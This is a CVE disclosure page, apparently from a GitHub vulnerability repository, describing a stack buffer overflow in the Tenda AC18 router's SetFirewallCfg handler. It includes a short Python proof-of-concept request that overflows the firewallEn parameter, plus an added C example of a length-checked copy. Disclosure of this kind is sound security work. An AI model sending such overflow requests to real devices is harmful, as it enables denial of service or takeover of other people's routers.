CVE-2022-30476: VulnRepo/IoT/Tenda/6 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/SetFirewallCfg page and affects the latest version of the Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318).)

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg, the user-provided parameter firewallEn is read into src, and this variable is passed to strcpy without any length check, which may overflow the stack-based buffer dest.

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a Denial of Service attack or Remote Code Execution with carefully crafted overflow data.
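The unchecked-copy pattern described above, next to a bounded replacement that rejects oversized input. This is an added example, not the firmware's code or the reporter's: the names copy_param and handle_firewall_en and the buffer size DEST_LEN are assumptions, since the page does not give the real size of dest.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size for illustration; the page does not state the real size of dest. */
#define DEST_LEN 8

/* Copy src into dest only if the value and its terminator fit.
 * Returns 0 on success, -1 if the input is missing or too long. */
static int copy_param(char *dest, size_t dest_len, const char *src)
{
    if (dest == NULL || src == NULL || dest_len == 0)
        return -1;
    /* Look for the terminator within the first dest_len bytes only. */
    const char *end = memchr(src, '\0', dest_len);
    if (end == NULL) {
        dest[0] = '\0';          /* leave dest as a valid empty string */
        return -1;
    }
    memcpy(dest, src, (size_t)(end - src) + 1);
    return 0;
}

/* Hypothetical stand-in for the handler: returns the accepted length or -1. */
int handle_firewall_en(const char *firewallEn)
{
    char dest[DEST_LEN];
    /* Pattern described on the page: strcpy(dest, firewallEn); with no length check. */
    if (copy_param(dest, sizeof dest, firewallEn) != 0)
        return -1;               /* reject the request instead of copying */
    return (int)strlen(dest);
}

int main(void)
{
    char oversized[0x500 + 1];   /* constructed input: same length as the page's PoC value */
    memset(oversized, 's', 0x500);
    oversized[0x500] = '\0';
    printf("short value   -> %d\n", handle_firewall_en("111"));
    printf("exact fit     -> %d\n", handle_firewall_en("1234567"));
    printf("one byte over -> %d\n", handle_firewall_en("12345678"));
    printf("0x500 bytes   -> %d\n", handle_firewall_en(oversized));
    return 0;
}
```

Rejecting the request outright, rather than silently truncating, keeps a malformed firewallEn value from being parsed as if it were valid.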

PoC

import requests

IP = "10.10.10.1"
url = f"http://{IP}/goform/SetFirewallCfg?"
url += "firewallEn=" + "s" * 0x500

response = requests.get(url)

Timeline

  • 2022-05-07: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30476)

Acknowledgement

Credit to @peanuts and @cylin from IIE, CAS.
